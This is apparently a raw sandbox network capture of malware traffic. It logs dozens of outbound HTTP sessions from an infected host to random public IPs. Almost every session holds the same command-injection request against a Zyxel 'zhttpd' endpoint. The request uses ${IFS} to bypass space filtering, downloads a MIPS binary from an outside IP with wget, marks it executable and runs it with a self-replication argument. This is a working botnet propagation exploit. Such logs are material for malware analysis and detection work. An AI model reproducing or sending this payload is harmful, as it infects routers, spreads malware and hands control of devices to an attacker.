                                                Jan 12, 2024 18:24:16.431514025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                392192.168.2.1338730133.181.58.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:16.431572914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                393192.168.2.134852497.154.221.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:16.431642056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                394192.168.2.134634888.246.156.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:17.435945988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                395192.168.2.1336474145.151.134.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:17.435965061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                396192.168.2.1342550145.232.191.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:17.436023951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                397192.168.2.133720474.173.27.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:17.436052084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                398192.168.2.1350096194.191.137.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:17.436109066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                399192.168.2.133403669.166.189.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:17.436229944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                400192.168.2.1337040150.10.242.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:18.440511942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                401192.168.2.135002635.91.211.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:18.440593004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                402192.168.2.1347594220.147.28.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:18.440643072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                403192.168.2.135972680.154.21.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:18.440670013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                404192.168.2.1338838116.252.203.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:19.445518017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                405192.168.2.1345076140.56.181.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:19.445570946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                406192.168.2.1347856128.17.238.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:19.445594072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                407192.168.2.135745092.104.127.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:19.445674896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                408192.168.2.134006625.212.55.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466615915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                409192.168.2.13420948.146.67.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466660976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                410192.168.2.1355062107.37.213.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466702938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                411192.168.2.1347634129.246.226.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466720104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                412192.168.2.133410084.179.157.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466772079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                413192.168.2.1342734137.161.133.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466789007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                414192.168.2.1349194180.251.184.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466839075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                415192.168.2.1347882165.114.213.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466871023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                416192.168.2.13588345.158.150.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466928005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                417192.168.2.1340254218.141.41.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.466970921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                418192.168.2.1336360147.99.147.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467009068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                419192.168.2.13580324.105.6.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467051029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                420192.168.2.1353266177.145.71.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467101097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                421192.168.2.1353406125.210.230.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467124939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                422192.168.2.1351904114.189.235.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467166901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                423192.168.2.134492691.125.189.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467209101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                424192.168.2.1333346157.206.50.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467243910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                425192.168.2.1348110131.152.103.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467284918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                426192.168.2.1350906203.201.242.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467328072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                427192.168.2.134367294.165.83.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467354059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                428192.168.2.1349700210.3.2.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467405081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                429192.168.2.1340500179.40.224.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467438936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                430192.168.2.1354672116.8.59.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467509031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                431192.168.2.1358910123.245.242.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467513084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                432192.168.2.134500259.127.200.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467542887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                433192.168.2.1341462124.98.86.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467597961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                434192.168.2.1348348192.38.196.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467664003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                435192.168.2.134333618.219.229.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467673063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                436192.168.2.1340566111.136.227.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467701912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                437192.168.2.13425548.98.152.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467750072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                438192.168.2.135644849.22.36.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467820883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                439192.168.2.135186037.11.103.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467822075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                440192.168.2.1341670170.159.240.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467864037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                441192.168.2.1349366209.245.190.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467891932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                442192.168.2.1358666146.251.47.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467940092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                443192.168.2.135838493.174.195.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.467971087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                444192.168.2.1360960173.214.101.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468003035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                445192.168.2.134932820.210.205.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468039989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                446192.168.2.1346996216.19.161.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468080044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                447192.168.2.1358402115.115.206.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468132019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                448192.168.2.1334446216.85.90.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468167067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                449192.168.2.1357682210.40.179.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468190908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                450192.168.2.134246892.93.148.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468226910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                451192.168.2.135138671.31.200.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468261957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                452192.168.2.1358966129.156.141.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468266010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                453192.168.2.135720024.66.121.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.468308926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                454192.168.2.133522052.187.220.18443
                                                TimestampBytes transferredDirectionData
